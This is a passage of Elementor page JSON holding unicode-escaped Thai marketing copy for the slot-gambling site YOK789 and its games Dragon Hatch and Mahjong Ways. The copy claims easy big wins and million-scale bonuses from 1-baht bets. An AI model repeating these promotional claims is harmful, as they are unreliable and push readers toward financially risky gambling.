\\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a 